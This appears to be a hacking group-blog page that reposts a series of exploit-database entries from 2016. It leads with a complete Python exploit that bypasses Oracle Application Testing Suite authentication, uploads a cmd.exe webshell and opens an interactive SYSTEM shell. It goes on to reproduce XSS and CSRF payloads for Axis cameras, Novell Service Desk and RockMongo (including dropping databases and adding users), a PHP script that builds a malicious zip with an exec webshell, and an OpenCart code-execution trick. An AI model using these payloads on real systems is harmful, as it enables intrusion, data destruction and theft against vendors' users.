# Exploit Title: Oracle Application Testing Suite Authentication Bypass and Arbitrary File Upload Remote Exploit
# Exploit Author: Zhou Yu <504137480@qq.com >
# Vendor Homepage: http://www.oracle.com/
# Software Link: http://www.oracle.com/technetwork/oem/downloads/apptesting-downloads-1983826.html?ssSourceSiteId=otncn
# Version: 12.4.0.2.0
# Tested on: Win7 SP1 32-bit
# CVE : CVE-2016-0492 and CVE-2016-0491
import urllib2
import urllib
ip = '192.168.150.239'
port = 8088
url = "http://" + ip + ":" + str(port)
#bypass authentication
url = url+"/olt/Login.do/../../olt/UploadFileUpload.do"
request = urllib2.Request(url)
webshell_content='''
<%@ page import="java.util.*,java.io.*" %>
<%
if (request.getParameter("{cmd}") != null) {{
Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("{cmd}"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while (disr != null) {{
out.println(disr);
disr = dis.readLine();
}}
}}
%>
'''
boundary = "---------------------------7e01e2240a1e"
request.add_header('Content-Type', "multipart/form-data; boundary=" + boundary)
post_data = "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"storage.extension\"\r\n"
post_data = post_data + "\r\n.jsp\r\n"
post_data = post_data + "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"fileName1\"\r\n"
post_data = post_data + "\r\nwebshell.jsp\r\n"
post_data = post_data + "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"fileName2\"\r\n"
post_data = post_data + "\r\n\r\n"
post_data = post_data + "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"fileName3\"\r\n"
post_data = post_data + "\r\n\r\n"
post_data = post_data + "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"fileName4\"\r\n"
post_data = post_data + "\r\n\r\n"
post_data = post_data + "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"fileType\"\r\n"
post_data = post_data + "\r\n*\r\n"
post_data = post_data + "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"file1\"; filename=\"webshell.jsp\"\r\n"
post_data = post_data + "Content-Type: text/plain\r\n"
post_data = post_data + "\r\n" + webshell_content +"\r\n"
post_data = post_data + "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"storage.repository\"\r\n"
post_data = post_data + "\r\nDefault\r\n"
post_data = post_data + "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"storage.workspace\"\r\n"
post_data = post_data + "\r\n.\r\n"
post_data = post_data + "--" + boundary + "\r\n"
post_data = post_data + "Content-Disposition: form-data; name=\"directory\"\r\n"
post_data = post_data + "\r\n" + "../oats\servers\AdminServer\\tmp\_WL_user\oats_ee\\1ryhnd\war\pages" +"\r\n"
post_data = post_data + "--" + boundary + "--"+"\r\n"
try:
request.add_data(post_data)
response = urllib2.urlopen(request)
if response.code == 200 :
print "[+]upload done!"
webshellurl = "http://" + ip + ":" + str(port) + "/olt/pages/webshell.jsp"
print "[+]wait a moment,detecting whether the webshell exists..."
if urllib2.urlopen(webshellurl).code == 200 :
print "[+]upload webshell successfully!"
print "[+]return a cmd shell"
while True:
cmd = raw_input(">>: ")
if cmd == "exit" :
break
print urllib.urlopen(webshellurl+"?{cmd}=" + cmd).read().lstrip()
else:
print "[-]attack fail!"
else:
print "[-]attack fail!"
except Exception as e:
print "[-]attack fail!"
'''
#run the exploit and get a cmd shell
root@kali:~/Desktop# python exploit.py
[+]upload done!
[+]wait a moment,detecting whether the webshell exists...
[+]upload webshell successfully!
[+]return a cmd shell
>>: whoami
nt authority\system
>>: exit
'''
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863592420
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Title: Ovidentia Module troubletickets 7.6 GLOBALS[babInstallPath] Remote File Inclusion Vulnerability
# Author: bd0rk || SCHOOL-OF-HACK.NET
# eMail: bd0rk[at]hackermail.com
# Website: http://www.school-of-hack.net
# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Ftroubletickets&file=troubletickets-7-6.zip&idf=838
Proof-of-Concept:
Vuln.-Code in /troubletickets-7-6/programs/statistique_evolution.php line 16
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
require_once $GLOBALS['babInstallPath'].'utilit/dateTime.php';
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+]Usage: http://[someone]/troubletickets-7-6/programs/statistique_evolution.php?GLOBALS[babInstallPath]=[SHELLCODE]
The problem: The GLOBALS[babInstallPath]-parameter isn't declared before require_once.
So an attacker can inject some php-shellcode (c99 or r57 for example) 'bout it.
It's no problem to patch it!
Declare this parameter or use an alert!
Greetings from bd0rk. HackThePlanet!
>> Multiple vulnerabilities in Novell Service Desk 7.1.0, 7.0.3 and 6.5
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
=================================================================================
Disclosure: 30/03/2016 / Last updated: 10/04/2016
>> Background on the affected products:
"Novell Service Desk 7.1.0 is a complete service management solution that allows you to easily monitor and solve services issues so that there is minimal disruption to your organization, which allows users to focus on the core business. Novell Service Desk provides an online support system to meet the service requirements of all your customers, administrators, supervisors, and technicians"
>> Summary:
Novell Service Desk has several vulnerabilities including a file upload function that can be exploited to achieve authenticated remote code execution. The product appears to be a rebranded version of Absolute Service (another help desk system). The latter has not been tested but it is likely to contain the same vulnerabilities as Novell Service Desk. The Google dork for this application is inurl:"LiveTime/WebObjects". Version 7.2 and above now appear to be branded as "Micro Focus Service Desk".
Advisories for these vulnerabilities can be found in the Micro Focus site at [1], [2], [3] and [4].
>> Technical details:
#1
Vulnerability: Arbitrary file upload via directory traversal (leading to remote code execution)
CVE-2016-1593
Constraints: Administrator account needed
Affected versions:
- NSD 7.1.0
- NSD 7.0.3
- NSD 6.5
- Possibly earlier versions
The User -> Customers -> Import function allows an administrator to upload files. The path specified in the filename parameter can be traversed using ../ characters and upload a JSP file to the Tomcat directory.
The default path to be traversed is /LiveTime/Uploads/ on the Novell Service Desk Virtual Appliance Demo.
POST /LiveTime/WebObjects/LiveTime.woa/wo/7.0.53.19.0.2.7.0.3.0.0.1 HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------2477470717121
Content-Length: 533
-----------------------------2477470717121
Content-Disposition: form-data; name="0.53.19.0.2.7.0.3.0.0.1.1.1.4.0.0.23"; filename="../../srv/tomcat6/webapps/LiveTime/bla5.jsp"
Content-Type: application/octet-stream
<HTML>
<HEAD>
<TITLE>Hello World</TITLE>
</HEAD>
<BODY>
<H1>Hello World</H1>
Today is: <%= new java.util.Date().toString() %>
</BODY>
</HTML>
-----------------------------2477470717121
Content-Disposition: form-data; name="ButtonUpload"
Upload
-----------------------------2477470717121--
#2
Vulnerability: Information disclosure (Download System logs as any authenticated user - even unprivileged customers)
CVE-2016-1594
Constraints: User / client account needed
Affected versions:
- NSD 7.0.3
- NSD 6.5
- Possibly earlier versions
GET /LiveTime/WebObjects/LiveTime.woa/wa/DownloadAction/downloadLogFiles
Contains the full error log, license and system information (operating system, java version, database, etc).
#3
Vulnerability: Information disclosure (Download any attachment from any client as an authenticated user - even unprivileged customers)
CVE-2016-1594
Constraints: User / client account needed
Affected versions:
- NSD 7.1.0
- NSD 7.0.3
- NSD 6.5
- Possibly earlier versions
GET /LiveTime/WebObjects/LiveTime.woa/wa/DownloadAction/downloadFile?attachmentId=1&entityName=ItemTypeAttach
Possible entityNames are:
KbaAttachment
ServiceAttachment
IncidentAttachment
ItemAttach
ProjectAttachment
GroupAttachment
ContractAttachment
ItemTypeAttach
Cycling through all attachmentId numbers will yield all attachments for each entityName.
#4
Vulnerability: Hibernate Query Language (HQL) injection
CVE-2016-1595
Constraints: User / client account needed
Affected versions:
- NSD 7.1.0
- NSD 7.0.3
- NSD 6.5
- Possibly earlier versions
GET /LiveTime/WebObjects/LiveTime.woa/wa/DownloadAction/downloadFile?attachmentId=1&entityName=<HQL injection here>
Input is passed directly to Hibernate (line 125 of DownloadAction.class):
List<?> attachments = ((com.livetime.Session)session()).getDbSession().createQuery(new StringBuilder().append("from ").append(hasEn).append(" as attach where attach.attachmentId = ").append(hasId.intValue()).toString()).list();
hasEn is entityName (string) and hasId is attachmentId (integer)
#5
Vulnerability: Stored Cross Site Scripting (XSS)
CVE-2016-1596
Constraints: User / client account needed
Affected versions:
- NSD 7.1.0
- NSD 7.0.3
- NSD 6.5
- Possibly earlier versions
Several sections of the web application are vulnerable to stored cross site scripting. This includes the administrator portal (when logged in as an administrator, technician, manager or other administrative user), the end user portal (when logged in as a normal end user) and the forums. The vulnerabilities below are just examples as the vulnerability is present in many different pages.
a)
In the customer portal, clicking the user name will allow you to edit your display name.
The fields tf_aClientFirstName and tf_aClientLastName are also vulnerable to stored XSS. Other fields might be vulnerable but have not been tested.
Example:
tf_aClientFirstName=Jos"><script>alert(1)</script>e&tf_aClientEmail=aa%40aa.bb&tf_aClientLastName="><script>alert(2)</script>Guestaa
This can be used to attack an administrator or any other management user, as the name will be changed globally. If an administrator sees the list of users an alert box will pop up.
b)
In the Forums the content section is vulnerable when creating a new topic.
The affected parameter is ta_selectedTopicContent.
Example:
tf_selectedTopicTitle=aaaaa&ta_selectedTopicContent="><script>alert(2)</script>&ButtonSave=Save
The alert box will pop up when you view the topic.
c)
In User -> Organizational Units, the name parameter is vulnerable (tf_orgUnitName) when you are creating a new Organizational Unit.
Example:
POST /LiveTime/WebObjects/LiveTime.woa/wo/18.0.53.21.0.4.1.3.0.1 HTTP/1.1
-----------------------------3162880314525
Content-Disposition: form-data; name="tf_orgUnitName"
"><script>alert(1)</script>
The alert box will pop up when you view the Organizational Units page and possibly in other pages.
d)
In Configuration -> Vendors, the manufacturer name, address and city parameters are vulnerable when you are creating a new Vendor.
Example:
tf_aManufacturerFullName="><script>alert(1)</script>&tf_aManufacturerName="><script>alert(1)</script>&tf_aManufacturerAddress="><script>alert(1)</script>&tf_aManufacturerCity="><script>alert(1)</script>&tf_aManufacturerPostalCode=&pu_countryDGDisplayedObjects=WONoSelectionString&tf_aManufacturerPhone=&tf_aManufacturerFax=&tf_aManufacturerUrl=&ButtonSave=Save
Three alert boxes will pop up when you view the Vendor page and possibly in other pages.
>> Fix:
#1, #3, #4 and 5# - Upgrade to version 7.2.0
#2 - Upgrade to version 7.1.0
>> References:
[1] https://www.novell.com/support/kb/doc.php?id=7017428
[2] https://www.novell.com/support/kb/doc.php?id=7017429
[3] https://www.novell.com/support/kb/doc.php?id=7017431
[4] https://www.novell.com/support/kb/doc.php?id=7017430
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=706
Android: IMemory Native Interface is insecure for IPC use
Platform: Tested on Android 6.0.1 January patches
Class: Elevation of Privilege
Summary:
The IMemory interface in frameworks/native/libs/binder/IMemory.cpp, used primarily by the media services can be tricked to return arbitrary memory locations leading to information disclosure or memory corruption.
Description:
The IMemory interface allows the passing of shared memory across the Binder IPC channel on Android. The interface supports a single remote call, GET_MEMORY which requests a separate IMemoryHeap interface along with an offset value and size for the shared memory buffer. The IMemoryHeap interface in turn supports a HEAP_ID call which marshals across a FileDescriptor, size, flags and an offset. This is passed to mmap to map the shared memory into the current process.
The underlying vulnerability is the sizes in IMemory and IMemoryHeap are not checked relative to one another, and nor is the offset in IMemory checked against the size of IMemoryHeap. This allows a local process to craft fake IMemory and IMemoryHeap objects such that they lie about their values and either cause information disclosure or memory corruption.
To understand this let’s look at how the pointer to the shared buffer is extracted from IMemory::pointer:
void* IMemory::pointer() const {
ssize_t offset;
sp<IMemoryHeap> heap = getMemory(&offset);
void* const base = heap!=0 ? heap->base() : MAP_FAILED;
if (base == MAP_FAILED)
return 0;
return static_cast<char*>(base) + offset; <- No check on IMemoryHeap size
}
Maybe we check sizes in getMemory() ?
sp<IMemoryHeap> BpMemory::getMemory(ssize_t* offset, size_t* size) const
{
if (mHeap == 0) {
Parcel data, reply;
data.writeInterfaceToken(IMemory::getInterfaceDescriptor());
if (remote()->transact(GET_MEMORY, data, &reply) == NO_ERROR) {
sp<IBinder> heap = reply.readStrongBinder();
ssize_t o = reply.readInt32();
size_t s = reply.readInt32(); <- No check.
if (heap != 0) {
mHeap = interface_cast<IMemoryHeap>(heap);
if (mHeap != 0) {
mOffset = o;
mSize = s;
}
}
}
}
if (offset) *offset = mOffset;
if (size) *size = mSize;
return mHeap;
}
Nope, as we can see, no check is made of IMemoryHeap’s size, so you could specify a mapped file smaller than offset and create a pointer out of bounds. Of course if IMemoryHeap is invalid then the mmap process will return MAP_FAILED which will end up as NULL after the call to pointer().
So how can this be abused? Any IPC service which calls pointer() can be tricked into accessing an arbitrary location, either a relative offset to the file mapped or NULL. For example look at ICrypto::onTransact with the DECRYPT operation. It checks that the offset is within the total size (this has been exploited before) with:
} else if (totalSize > sharedBuffer->size()) {
result = -EINVAL;
} else if ((size_t)offset > sharedBuffer->size() - totalSize) {
result = -EINVAL;
The size is the value returned through IMemory, and not the actual mapped size from IMemoryHeap so in this case offset can be arbitrary. With the right plugin (such as the clearkey plugin) we can get this to read arbitrary memory. Even more so as there’s no NULL checking in pointer() we can cause IMemoryHeap to fail which causes pointer() to return NULL. Setting size to 0xFFFFFFFF means we can read any memory location from 0 to 0xFFFFFFFF.
This can be turned into an arbitrary write as long as you can pass an arbitrary IMemory to another service. For example the BnCameraRecordingProxy::onTransact in frameworks/av/camera/ICameraRecordingProxy.cpp does the following for onReleaseRecordingFrame
case RELEASE_RECORDING_FRAME: {
ALOGV("RELEASE_RECORDING_FRAME");
CHECK_INTERFACE(ICameraRecordingProxy, data, reply);
sp<IMemory> mem = interface_cast<IMemory>(data.readStrongBinder());
if (CameraUtils::isNativeHandleMetadata(mem)) {
VideoNativeHandleMetadata *metadata =
(VideoNativeHandleMetadata*)(mem->pointer());
metadata->pHandle = data.readNativeHandle();
// releaseRecordingFrame will be responsble to close the native handle.
}
releaseRecordingFrame(mem);
return NO_ERROR;
} break;
As you can coerce the pointer value, as long as the first 4 bytes make the integer 3 the next 4 bytes will be overwritten by the native handle value which can be controlled.
Proof of Concept:
I’ve provided a PoC which exploits the issue in ICrypto::decrypt. I will just SIG_SEGV on reading an arbitrary location (in this case 1GiB relative to the mapped memory). If it succeeds then that’s good as well as it shouldn't succeed. You should be able to create default Android Studio project and replace the MainActivity with the provided Java file. When run it should cause media server to crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39686.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=711
Android: Information Disclosure in IOMX getConfig/getParameter
Platform: Verified on google/razor/flo:6.0.1/MMB29O/2459718:user/release-keys
Class: Information Disclosure
Summary:
The GET_CONFIG and GET_PARAMETER calls on IOMX are vulnerable to an information disclosure of uninitialized heap memory. This could be used by an attacker to break ASLR in the media server process by reading out heap memory which contains useful address information.
Description:
The relevant code in frameworks/av/media/libmedia/IOMX.cpp is:
node_id node = (node_id)data.readInt32();
OMX_INDEXTYPE index = static_cast<OMX_INDEXTYPE>(data.readInt32());
size_t size = data.readInt64();
void *params = malloc(size);
data.read(params, size); <- Read in the buffer from the parcel to initialize
// SNIP - getParameter etc.
if ((code == GET_PARAMETER || code == GET_CONFIG) && err == OK) {
reply->write(params, size); <- Write back entire buffer to caller
}
The vulnerability stems from the fact that Parcel::read(void* outData, size_t len) fails quickly if it doesn’t have sufficient data in the parcel to satisfy the request leaving the outData buffer untouched. As long as the call to getParameter or getConfig succeed then the entire, mostly uninitialized buffer will be returned. For example if the parameter is only 8 bytes in size but the caller passes a size field of 128 bytes (but doesn’t write those 128 bytes into the parcel) then the 120 bytes following in the heap will be returned uninitialized.
Arguably there’s also a potential NULL pointer dereference here depending on the implementation as the call to malloc can fail with an arbitrary size value. But I think later functions handle the NULL case.
I’d suggest that the result of data.read should be checked to ensure all the data has been read correctly.
Proof of Concept:
I’ve provided a PoC which exploits the issue and prints a 64 byte buffer (with 56 bytes uninitialized) to logcat. It uses the OMX.qcom.video.decoder.mpeg4 component. I’ve only tested this on a Nexus 5 and Nexus 7 devices, but I’m guessing that decoder should be everywhere. You should be able to create default Android Studio project and call OMXInfoDisclosurePoC.testOMX
from the Main Activity. When run you should see a line in logcat similar to:
E/MyClass: allocateNode Error: 0
E/MyClass: Allocate Node: 42
E/MyClass: Result: 040000000101000XXXXXXXXXX
Where XXXXXX should be uninitialized memory from the heap.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39685.zip
_ _ _ _
| | | | | |
___ _ ____ _____| | | | __ _| |__ ___
/ _ \| '__\ \ /\ / / _ \ | | |/ _` | '_ \/ __| 6079 Smith W
| (_) | | \ V V / __/ | | | (_| | |_) \__ \ doubleplusungood
\___/|_| \_/\_/ \___|_|_|_|\__,_|_.__/|___/ owning some telescreens...
Security Adivisory
2016-04-09
www.orwelllabs.com
twt:@orwelllabs
I. ADVISORY INFORMATION
-----------------------
Title: Axis Network Cameras Multiple Cross-site scripting
Vendor: Axis Communications
Class: Improper Input Validation [CWE-20]
CVE Name: CVE-2015-8256
Remotely Exploitable: Yes
Locally Exploitable: No
OLSA-ID: OLSA-2015-8256
Adivisory URL:
http://www.orwelllabs.com/2016/01/axis-network-cameras-multiple-cross.html
II. Background
--------------
Axis is the market leader in network video, invented the world’s first
network camera back in 1996 and we’ve been innovators in video surveillance
ever since. Axis network video products are installed in public places and
areas such as retail chains, airports, trains, motorways, universities,
prisons, casinos and banks.
III. vulnerability
------------------
AXIS Network Cameras are prone to multiple (stored/reflected) cross-site
scripting vulnerability.
IV. technical details
---------------------
These attack vectors allow you to execute an arbitrary javascript code in
the user browser (session) with this steps:
# 1 Attacker injects a javascript payload in the vulnerable page:
http://{axishost}/axis-cgi/vaconfig.cgi?action=get&name=<script
type="text/javascript>prompt("AXIS_PASSWORD:")</script>
This will create a entry in the genneral log file (/var/log/messages) So,
when the user is viewing the log 'system options' -> 'support' -> 'Logs &
Reports':
http://{axishost}/axis-cgi/admin/systemlog.cgi?id
will be displayed a prompt for the password of the current user
('AXIS_PASSWORD').
However, due to CSRF presented is even possible to perform all actions
already presented: create, edit and remove users and applications, etc. For
example, to delete an application "axis_update" via SXSS:
http://{axishost}/axis-cgi/vaconfig.cgi?action=get&name=<script src="http://
axishost/axis-cgi/admin/local_del.cgi?+/usr/html/local/viewer/axis_update.shtml"></script>
* A reflected cross-site scripting affects all models of AXIS devices on
the same parameter:
http://
{axis-cam-model}/view/view.shtml?imagePath=0WLL</script><script>alert('AXIS-XSS')</script><!--
# Other Vectors
http://
{axishost}/admin/config.shtml?group=%3Cscript%3Ealert%281%29%3C/script%3E
http://{axishost}/view/custom_whiteBalance.shtml?imagePath=<img src="xs"
onerror=alert(7) /><!--
http://
{axishost}/admin-bin/editcgi.cgi?file=<script>alert('SmithW')</script>
http://
{axishost}/operator/recipient_test.shtml?protocol=%3Cscript%3Ealert%281%29%3C/script%3E
http://
{axishost}/admin/showReport.shtml?content=alwaysmulti.sdp&pageTitle=axis</title></head><body><pre><script>alert(1)</script>
# SCRIPTPATHS:
{HTMLROOT}/showReport.shtml
{HTMLROOT}/config.shtml
{HTMLROOT}/incl/top_incl.shtml
{HTMLROOT}/incl/popup_header.shtml
{HTMLROOT}/incl/page_header.shtml
{HTMLROOT}/incl/top_incl_popup.shtml
{HTMLROOT}/viewAreas.shtml
{HTMLROOT}/vmd.shtml
{HTMLROOT}/custom_whiteBalance.shtml
{HTMLROOT}/playWindow.shtml
{HTMLROOT}/incl/ptz_incl.shtml
{HTMLROOT}/view.shtml
{HTMLROOT}/streampreview.shtml
And many, many others...
V. Impact
---------
allows to run arbitrary code on a victim's browser and computer if combined
with another flaws in the same devices.
VI. Affected products
---------------------
Multiple Axis Network products.
VII. solution
-------------
It was not provided any solution to the problem.
VIII. Credits
-------------
The vulnerability has been discovered by SmithW from OrwellLabs
IX. Legal Notices
-----------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this
information.
X. Vendor solutions and workarounds
-----------------------------------
There was no response from the vendor.
About Orwelllabs
++++++++++++++++
Orwelllabs is a (doubleplusungood) security research lab interested in embedded
device & webapp hacking.
#########################################################################################################################################################
# Exploit Title: RockMongo v1.1.8 - PHP MongoDB Administrator Multiple
Vulnerabilities
# Date: 11.04.2016
# Exploit Author: Ozer Goker
# Vendor Homepage: http://rockmongo.com
# Software Link: https://github.com/iwind/rockmongo
# Version: [app version] 1.1.8
#########################################################################################################################################################
What is RockMongo?
RockMongo, a MongoDB administration tool, written in PHP5, is Best in PHP
world, more like PHPMyAdmin. source = http://rockmongo.com
Vulnerabilities: CSRF | HTML(or Iframe) Injection | XSS (Reflected & Stored)
XSS details:
#########################################################################################################################################################
XSS1 (Reflected)
URL
http://localhost/rockmongo/index.php?action=login.index
METHOD
Post
PARAMETER
username
PAYLOAD
"><script>alert(1)</script>
#########################################################################################################################################################
XSS2 (Reflected)
URL
http://localhost/rockmongo/index.php?action=login.index
METHOD
Post
PARAMETER
db
PAYLOAD
"><script>alert(1)</script>
#########################################################################################################################################################
XSS3 (Reflected)
URL
http://localhost/rockmongo/index.php?action=server.createDatabase
METHOD
Post
PARAMETER
name
PAYLOAD
<script>alert(3)</script>
#########################################################################################################################################################
XSS4 (Stored)
URL
http://localhost/rockmongo/index.php?action=db.newCollection&db=test
METHOD
Post
PARAMETER
name
PAYLOAD
<script>alert(4)</script>
#########################################################################################################################################################
XSS5 (Reflected)
URL
http://localhost/rockmongo/index.php?action=server.command&db=test
METHOD
Post
PARAMETER
db
PAYLOAD
<script>alert(5)</script>
#########################################################################################################################################################
XSS6 (Reflected)
URL
http://localhost/rockmongo/index.php?action=collection.removeCollection&db=test&collection=system.indexes%3Cscript%3Ealert%286%29%3C/script%3E
METHOD
Get
PARAMETER
collection
PAYLOAD
<script>alert(6)</script>
#########################################################################################################################################################
XSS7 (Reflected)
URL
http://localhost/rockmongo/index.php?action=collection.index&collection=system.indexes&command=findAll&criteria=%22%3E%3Cscript%3Ealert%287%29%3C/script%3E&db=test&field[0]=_id&format=array&limit=0&order[0]=asc&pagesize=10&query_fields[0]=v
METHOD
Get
PARAMETER
criteria
PAYLOAD
"><script>alert(7)</script>
#########################################################################################################################################################
XSS8 (Reflected)
URL
http://localhost/rockmongo/index.php/"><script>alert(8)</script>
METHOD
Get
PARAMETER
URL
PAYLOAD
"><script>alert(8)</script>
#########################################################################################################################################################
HTML Injection details:
#########################################################################################################################################################
HTML Injection1
URL
http://localhost/rockmongo/index.php?action=login.index
METHOD
Post
PARAMETER
username,db
PAYLOAD
"><iframe src=http://www.rockmongo.com></iframe>
#########################################################################################################################################################
HTML Injection2
URL
http://localhost/rockmongo/index.php?action=server.createDatabase
METHOD
Post
PARAMETER
name
PAYLOAD
<iframe src=http://www.rockmongo.com>
#########################################################################################################################################################
HTML Injection3 (Stored)
URL
http://localhost/rockmongo/index.php?action=db.newCollection&db=test
METHOD
Post
PARAMETER
name
PAYLOAD
<iframe src=http://www.rockmongo.com>
#########################################################################################################################################################
HTML Injection4
URL
http://localhost/rockmongo/index.php?action=server.command&db=test
METHOD
Post
PARAMETER
db
PAYLOAD
<iframe src=http://www.rockmongo.com>
#########################################################################################################################################################
HTML Injection5
URL
http://localhost/rockmongo/index.php?action=collection.removeCollection&db=test&collection=system.indexes%3Ciframe%20src=http://www.rockmongo.com%3E
METHOD
Get
PARAMETER
collection
PAYLOAD
<iframe src=http://www.rockmongo.com>
#########################################################################################################################################################
HTML Injection6
URL
http://localhost/rockmongo/index.php?action=collection.index&collection=system.indexes&command=findAll&criteria=%22%3E%3Ciframe%20src=http://www.rockmongo.com%3E&db=test&field[0]=_id&format=array&limit=0&order[0]=asc&pagesize=10&query_fields[0]=v
METHOD
Get
PARAMETER
criteria
PAYLOAD
"><iframe src=http://www.rockmongo.com>
#########################################################################################################################################################
CSRF details:
#########################################################################################################################################################
CSRF1
Create Database
<html>
<body>
<form action="
http://localhost/rockmongo/index.php?action=server.createDatabase"
method="POST">
<input type="text" name="name" value="exploit-db" />
<input type="submit" value="Create DB" />
</form>
</body>
</html>
#########################################################################################################################################################
CSRF2
Drop Database
<html>
<body>
<form action="
http://localhost/rockmongo/index.php?action=db.dropDatabase" method="POST">
<input type="text" name="db" value="exploit-db"/>
<input type="hidden" name="confirm" value="1"/>
<input type="submit" value="Drop DB"/>
</form>
</body>
</html>
#########################################################################################################################################################
CSRF3
Create Collection
<html>
<body>
<form action="
http://localhost/rockmongo/index.php?action=db.newCollection&db=exploit-db"
method="POST">
<input type="text" name="name" value="exploit-Collection" />
<input type="submit" value="Create Collection" />
</form>
</body>
</html>
#########################################################################################################################################################
CSRF4
Drop Collection
<html>
<body>
<form action="
http://localhost/rockmongo/index.php?action=collection.removeCollection&db=exploit-db"
method="POST">
<input type="text" name="collection" value="exploit-Collection"/>
<input type="submit" value="Drop Collection"/>
</form>
</body>
</html>
#########################################################################################################################################################
CSRF5
Add Database User
<html>
<body>
<form action="
http://localhost/rockmongo/index.php?action=db.addUser&db=admin"
method="POST">
<input type="text" name="username" value="test"/>
<input type="text" name="password" value="test"/>
<input type="text" name="password2" value="test"/>
<input type="submit" value="Add User"/>
</form>
</body>
</html>
#########################################################################################################################################################
CSRF6
Delete Database User
<html>
<body>
<form action="
http://localhost/rockmongo/index.php?action=db.deleteUser&db=admin"
method="POST">
<input type="text" name="user" value="test"/>
<input type="submit" value="Remove User"/>
</form>
</body>
</html>
#########################################################################################################################################################
CSRF7
Command Execute
<html>
<body>
<form action="
http://localhost/rockmongo/index.php?action=server.command&" method="POST">
<input type="text" name="command" value="{ listCommands: 1 }"/>
<input type="text" name="db" value="admin"/>
<input type="text" name="format" value="json"/>
<input type="submit" value="Command Execute"/>
</form>
</body>
</html>
#########################################################################################################################################################
CSRF8
Execute Code
<html>
<body>
<form action="
http://localhost/rockmongo/index.php?action=server.execute&db=admin"
method="POST">
<input type="text" name="code" value="function () { var plus = 1 + 2;
return plus; }"/>
<input type="text" name="db" value="admin"/>
<input type="submit" value="Execute Code"/>
</form>
</body>
</html>
#########################################################################################################################################################
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/CAMUNZIP-ARCHIVE-PATH-TRAVERSAL.txt
Vendor:
=================
www.camunzip.com
Product:
==============
CAM UnZip v5.1
Vulnerability Type:
======================
Archive Path Traversal
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
CAM UnZip fails to check that the paths of the files in the archive do not
engage in path traversal when uncompressing the archive files.
specially crafted files in the archive containing '..\' in file name can
overwrite files on the filesystem by backtracking or allow attackers
to place malicious files on system outside of the target unzip directory
which may lead to remote command execution exploits etc...
Tested successfully Windows 7
Exploit code(s):
===============
malicious archive script...
<?php
#CAM UnZip v5.1
#directory traversal to remote code execution exploit
#====================================================
if($argc<2){echo "Usage: <filename>";exit();}
$file_name=$argv[1];
$zip = new ZipArchive();
$res = $zip->open("$file_name.zip", ZipArchive::CREATE);
$zip->addFromString("..\..\..\..\..\..\..\..\RCE.php", '<?php
exec($_GET["cmd"]); ?>');
$zip->close();
echo "Malicious archive created...\r\n";
echo "========= hyp3rlinx ============";
?>
/////////////////////////////////////////////////////////////////////////////////////
Result:
Creating Folder: C:\Test\BOZO
Extracting Files From: C:\Test\BOZO.zip
Unzipped file C:\Test\BOZO\..\..\..\..\..\..\..\..\RCE.php of size 28
1 file was Extracted.
C:\RCE.php
Exploitation Technique:
=======================
Local
Severity Level:
================
Medium
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
hyp3rlinx
OpenCart json_decode function Remote PHP Code Execution
Author: Naser Farhadi
Twitter: @naserfarhadi
Date: 9 April 2016 Version: 2.1.0.2 to 2.2.0.0 (Latest version)
Vendor Homepage: http://www.opencart.com/
Vulnerability:
------------
/upload/system/helper/json.php
$match = '/".*?(?<!\\\\)"/';
$string = preg_replace($match, '', $json);
$string = preg_replace('/[,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]/', '', $string);
...
$function = @create_function('', "return {$json};"); /**** The Root of All Evil ****/
$return = ($function) ? $function() : null;
...
return $return;
Exploit(json_decode):
------------
var_dump(json_decode('{"ok":"{$_GET[b]($_GET[c])}"}'));
var_dump(json_decode('{"ok":"$_SERVER[HTTP_USER_AGENT]"}'));
var_dump(json_decode('{"ok":"1"."2"."3"}'));
Real World Exploit(OpenCart /index.php?route=account/edit)
------------
go to http://host/shop_directory/index.php?route=account/edit
fill $_SERVER[HTTP_USER_AGENT] as First Name
/** save it two times **/
Code execution happens when an admin user visits the administration panel, in this example
admin user sees his user agent as your First Name in Recent Activity :D
